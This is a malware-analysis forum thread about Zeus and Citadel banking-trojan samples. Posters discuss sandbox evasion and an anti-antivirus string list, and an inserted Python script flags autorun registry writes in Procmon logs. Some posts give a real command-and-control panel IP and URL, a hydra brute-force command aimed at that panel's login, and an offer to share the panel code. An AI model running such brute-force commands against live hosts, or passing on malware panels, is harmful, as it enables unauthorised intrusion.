A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #17588  by EP_X0FF
 Fri Jan 04, 2013 11:10 am
Cassiel wrote:@ EP_X0FF

I have run the sample in my VM and I noticed some strange things. If I run it outside BSA it will set the autorun part; if I run it inside BSA it won't.
There are the "usual" registry changes but there is nothing being added to the run key. It is like it puts itself to sleep and then can no longer continue.
Probably its activity is restricted by the sandbox. Why do you want to run malware in VM + Sandboxie?
 #17589  by Buster_BSA
 Fri Jan 04, 2013 12:05 pm
Cassiel wrote:@ EP_X0FF

I have run the sample in my VM and I noticed some strange things. If I run it outside BSA it will set the autorun part; if I run it inside BSA it won't.
There are the "usual" registry changes but there is nothing being added to the run key. It is like it puts itself to sleep and then can no longer continue.
Probably the malware is injecting code into a system process and then setting the autorun part from there. As Sandboxie does not allow injection into processes running outside the sandbox, the process will fail, and so will the autorun.
Last edited by Buster_BSA on Fri Jan 04, 2013 2:33 pm, edited 1 time in total.
 #17590  by Cassiel
 Fri Jan 04, 2013 12:40 pm
@ EP_X0FF

Well my idea was to use a VM with BSA in order to have a snapshot if things went wrong.
I tried cuckoo also, however I like the reporting from BSA a lot more than cuckoo.

@ Buster_BSA

You are most likely right, I am going to check this with procmon in order to see how the registry key is being set.


EDIT:

You are right, it is injecting into explorer and after that it is creating the autorun key.
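A defender-side check for what Cassiel observed (the Run key being written by explorer.exe after injection), added here as an example and not part of the thread: it scans a Procmon CSV export for successful Run/RunOnce writes, flags those made by processes that are typical injection hosts, and links the written path back to the process that dropped the file. The column names follow Procmon's default CSV export; the log lines themselves are constructed.

```python
import csv
import io

# Constructed Procmon-style CSV export (not a real capture): the sample drops a
# file, then explorer.exe (injected) writes the Run value pointing at it.
SAMPLE_LOG = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"12:40:01.1","sample.exe","1234","CreateFile","C:\\Users\\vm\\AppData\\Roaming\\xyz\\bot.exe","SUCCESS","Desired Access: Generic Write"
"12:40:01.2","sample.exe","1234","RegSetValue","HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","SUCCESS","Type: REG_DWORD, Data: 1"
"12:40:02.0","explorer.exe","1540","RegSetValue","HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\{A1B2}","SUCCESS","Type: REG_SZ, Data: C:\\Users\\vm\\AppData\\Roaming\\xyz\\bot.exe"
"12:40:03.0","svchost.exe","800","RegSetValue","HKLM\\SYSTEM\\CurrentControlSet\\Services\\Foo\\Start","SUCCESS","Type: REG_DWORD, Data: 2"
"""

# Registry paths that make a binary start at logon (compared case-insensitively)
RUN_KEYS = (
    "\\software\\microsoft\\windows\\currentversion\\run\\",
    "\\software\\microsoft\\windows\\currentversion\\runonce\\",
)

# Common injection hosts; in a clean session these do not write Run values
INJECTION_HOSTS = {"explorer.exe", "svchost.exe", "iexplore.exe"}


def find_autorun_writes(csv_text):
    """Return (process, pid, path, detail) for every successful Run/RunOnce write."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Operation"] != "RegSetValue" or row["Result"] != "SUCCESS":
            continue
        if any(k in row["Path"].lower() for k in RUN_KEYS):
            hits.append((row["Process Name"], int(row["PID"]), row["Path"], row["Detail"]))
    return hits


def suspicious_autorun_writes(csv_text):
    """Autorun writes performed by a process that is a typical injection host."""
    return [h for h in find_autorun_writes(csv_text) if h[0].lower() in INJECTION_HOSTS]


def link_to_dropper(csv_text):
    """For each suspicious write, name the process that created the file it points to."""
    creators = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Operation"] == "CreateFile" and "Generic Write" in row["Detail"]:
            creators[row["Path"].lower()] = row["Process Name"]
    links = []
    for proc, _pid, _path, detail in suspicious_autorun_writes(csv_text):
        target = detail.split("Data: ", 1)[-1].strip().strip('"')
        links.append((proc, target, creators.get(target.lower())))
    return links
```

Run it against a real Procmon CSV by reading the file into `find_autorun_writes`; a Run value written by explorer.exe that points at a file another process just dropped is the pattern described in this post.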
 #17594  by Buster_BSA
 Fri Jan 04, 2013 2:32 pm
Cassiel wrote:You are right, it is injecting into explorer and after that it is creating the autorun key.
I would like such injections to be done successfully so the BSA analysis can be more complete, but that depends on Sandboxie's restrictions. I am going to talk with Ronen about this and I will ask him if there is any workaround to solve the issue.
 #17787  by bsteo
 Mon Jan 21, 2013 10:10 am
Citadel 1.3.5.1 Rain Edition sample. It has some anti-VM and anti-AV functions; I couldn't run it under Comodo and didn't try manually, maybe someone will.
Attachments
password: "infected"
 #17789  by EP_X0FF
 Mon Jan 21, 2013 2:36 pm
exitthematrix wrote:Citadel 1.3.5.1 Rain Edition sample. It has some anti-VM
Not found, except a lame trick with GetKeyboardLayoutList (patch two bytes @00418FC6 with nops) and another lame trick with
Code:
ROOT\SECURITYCENTERROOT\SECURITYCENTER2 SELECT * FROM%sWQL
Antivirus Product company Name display Name version Number Unknown Company:%s
Product:%s
Version:%s
Firewall Product 
Software\Microsoft\Windows\CurrentVersion\Uninstall
Publisher Display Name Display Version%u:%s|%s|%s
Code:
SafenSoft SysWatch  McAfee  McAfee Security Center  McAfee SecurityCenter   Symantec Client   Symantec Protection   Symantec Shared   Symantec Security   Norton Protection   Kaspersky Security  Kaspersky Anti-Virus  avast! Antivirus  AntiVir Desktop   AVG Monitor   AVG Service   AVG Security  ESET Security   ESET Antivirus  Microsoft Inspection  Microsoft Malware   Microsoft Security
+ http://www.kernelmode.info/forum/viewto ... 553#p17553

Patched Zeus result (full disclosure).
http://camas.comodo.com/cgi-bin/submit? ... f9856e4263

No matter how it is named - zeus, ice-ix, citadel - it is all the same slavik shit.
 #17794  by Xylitol
 Mon Jan 21, 2013 5:08 pm
Code:
• dns: 1 ›› ip: 62.109.1.7 - adresse: CITAB-TEST.TK
http://62.109.1.7/net/panel.php?m=login
Code:
http://62.109.1.7/net/install/
• [0] - Connecting to MySQL as 'citab-test'.
• [0] - Selecting DB 'citab-test'.
• [0] - Updating table 'botnet_list'.
• [0] - Creating table 'botnet_reports'.
• [0] - Updating table 'botnet_reports_130119'.
• [0] - Filling table 'ipv4toc'.
• [0] - Creating table 'ipv4toc'.
• [3] - Updating table 'cp_users'.
• [3] - Updating table 'botnet_scripts'.
• [3] - Updating table 'botnet_scripts_stat'.
• [3] - Updating table 'botnet_software_stat'.
• [3] - Updating table 'exe_updates'.
• [3] - Updating table 'exe_updates_crypter'.
• [3] - Updating table 'accparse_rules'.
• [3] - Updating table 'accparse_accounts'.
• [3] - Updating table 'vnc_bot_connections'.
• [3] - Updating table 'jabber_messages'.
• [3] - Updating table 'botnet_screenshots'.
• [3] - Updating table 'botnet_rep_favorites'.
• [3] - Updating table 'botnet_activity'.
• [3] - Updating table 'botnet_webinjects_group'.
• [3] - Updating table 'botnet_webinjects_group_perms'.
• [3] - Updating table 'botnet_webinjects'.
• [3] - Updating table 'botnet_webinjects_bundle'.
• [3] - Updating table 'botnet_webinjects_bundle_execlim'.
• [3] - Updating table 'botnet_webinjects_bundle_members'.
• [3] - Updating table 'botnet_webinjects_history'.
• [3] - Creating folder '_logos'.
• [3] - Writing config file
• [3] - Searching for the god particle...
• [3] - Creating folder 'system/data'.
• [3] - Creating folder 'public'.
• [3] - Creating folder 'files'.
• [3] - Creating folder 'files/webinjects'.
-- Update complete! --
EP_X0FF wrote:No matter how it is named - zeus, ice-ix, citadel - it is all the same slavik shit.
Code:
-l admin -P pwd.lst -s 80 -w 64 -f -V 62.109.1.7 http-post-form "/net/panel.php?m=login:user=admin&pass=^PASS^:Bad user name or password."
And it's the same command for brute-forcing Zeus, Ice9, Citadel.
 #17797  by bsteo
 Mon Jan 21, 2013 6:59 pm
If someone needs the PHP Admin Panel of this slavik mod shit, let me know, I can upload it.